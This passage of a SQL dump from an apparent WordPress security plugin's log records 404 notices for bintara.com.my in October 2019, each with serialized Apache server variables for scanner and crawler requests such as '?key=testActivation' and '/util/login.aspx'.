EQUEST_TIME\";s:10:\"1571673926\";}}','notice','2019-10-21 16:05:27','2019-10-21 16:05:26',34971200,36782896,'https://bintara.com.my/oldsite/?key=testActivation',1,0,'164.132.44.97'),(28628,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/www/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/www/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/www/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa3Xd@AgYuZ1@aLzbZj3swAAAIM\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/www/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/www/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa3Xd@AgYuZ1@aLzbZj3swAAAIM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"193.70.2.138\";s:11:\"REMOTE_PORT\";s:5:\"53553\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/www/\";s:10:\"SCRIPT_URL\";s:5:\"/www/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa3Xd@AgYuZ1@aLzbZj3swAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571673976.1127\";s:12:\"REQUEST_TIME\";s:10:\"1571673976\";}}','notice','2019-10-21 16:06:17','2019-10-21 16:06:16',34968016,36774520,'https://bintara.com.my/www/?key=testActivation',1,0,'193.70.2.138'),(28629,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:40:\"/www/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/www/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/www/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa3XkuAgYuZ1@aLzbZj3wgAAAJM\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/www/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/www/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa3XkuAgYuZ1@aLzbZj3wgAAAJM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"193.70.2.138\";s:11:\"REMOTE_PORT\";s:5:\"55930\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/www/\";s:10:\"SCRIPT_URL\";s:5:\"/www/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa3XkuAgYuZ1@aLzbZj3wgAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571674002.6751\";s:12:\"REQUEST_TIME\";s:10:\"1571674002\";}}','notice','2019-10-21 16:06:44','2019-10-21 16:06:43',34971536,36770112,'https://bintara.com.my/www/?initiationactivity=initiationready',1,0,'193.70.2.138'),(28630,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/util/login.aspx\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=2ce1afbd80cddffe6e7619620d432414\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/util/login.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/util/login.aspx\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa3y0xAAxqfYqgF3mYfNowAAAFM\";s:12:\"REDIRECT_URL\";s:16:\"/util/login.aspx\";s:11:\"REMOTE_ADDR\";s:14:\"35.190.193.225\";s:11:\"REMOTE_PORT\";s:5:\"55964\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/util/login.aspx\";s:10:\"SCRIPT_URL\";s:16:\"/util/login.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa3y0xAAxqfYqgF3mYfNowAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571680985.8589\";s:12:\"REQUEST_TIME\";s:10:\"1571680985\";}}','notice','2019-10-21 18:03:09','2019-10-21 18:03:06',34969680,36772576,'https://bintara.com.my/util/login.aspx',1,0,'35.190.193.225'),(28631,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:142:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 YaBrowser/16.9.1.1131 Yowser/2.5 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.230.195.62\";s:11:\"REMOTE_PORT\";s:5:\"51386\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa3ziSEiZGLZYlop40fnnQAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571681161.9873\";s:12:\"REQUEST_TIME\";s:10:\"1571681161\";}}','notice','2019-10-21 18:06:05','2019-10-21 18:06:02',35405928,37211752,'https://bintara.com.my/?page_id=18',1,0,'5.230.195.62'),(28632,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:41:\"/blog/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa317CEiZGLZYlop40foyQAAAQo\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa317CEiZGLZYlop40foyQAAAQo\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"37.187.77.211\";s:11:\"REMOTE_PORT\";s:5:\"51509\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:10:\"SCRIPT_URL\";s:6:\"/blog/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa317CEiZGLZYlop40foyQAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571681772.2719\";s:12:\"REQUEST_TIME\";s:10:\"1571681772\";}}','notice','2019-10-21 18:16:14','2019-10-21 18:16:12',34971600,36784736,'https://bintara.com.my/blog/?initiationactivity=initiationready',1,0,'37.187.77.211'),(28633,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa32DRAAxqfYqgF3mYfODQAAAEU\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa32DRAAxqfYqgF3mYfODQAAAEU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"37.187.77.211\";s:11:\"REMOTE_PORT\";s:5:\"54947\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:10:\"SCRIPT_URL\";s:6:\"/blog/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa32DRAAxqfYqgF3mYfODQAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571681805.9279\";s:12:\"REQUEST_TIME\";s:10:\"1571681805\";}}','notice','2019-10-21 18:16:47','2019-10-21 18:16:46',34972656,36784864,'https://bintara.com.my/blog/?key=testActivation',1,0,'37.187.77.211'),(28634,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/?page_id=18%2Fcontact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:142:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 YaBrowser/16.9.1.1131 Yowser/2.5 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:24:\"page_id=18%2Fcontact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.230.195.62\";s:11:\"REMOTE_PORT\";s:5:\"63262\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa4K7iEiZGLZYlop40f0TwAAAQw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571687150.8001\";s:12:\"REQUEST_TIME\";s:10:\"1571687150\";}}','notice','2019-10-21 19:45:53','2019-10-21 19:45:51',35409896,37214016,'https://bintara.com.my/?page_id=18%2Fcontact.php',1,0,'5.230.195.62'),(28635,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:142:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 YaBrowser/16.9.1.1131 Yowser/2.5 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.230.195.62\";s:11:\"REMOTE_PORT\";s:5:\"50237\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa4MqCEiZGLZYlop40f1UQAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571687593.2496\";s:12:\"REQUEST_TIME\";s:10:\"1571687593\";}}','notice','2019-10-21 19:53:15','2019-10-21 19:53:13',35310880,37122312,'https://bintara.com.my/?page_id=18/contact.php',1,0,'5.230.195.62'),(28636,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4RHuAgYuZ1@aLzbZgLMAAAAIc\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:12:\"141.8.142.64\";s:11:\"REMOTE_PORT\";s:5:\"52368\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com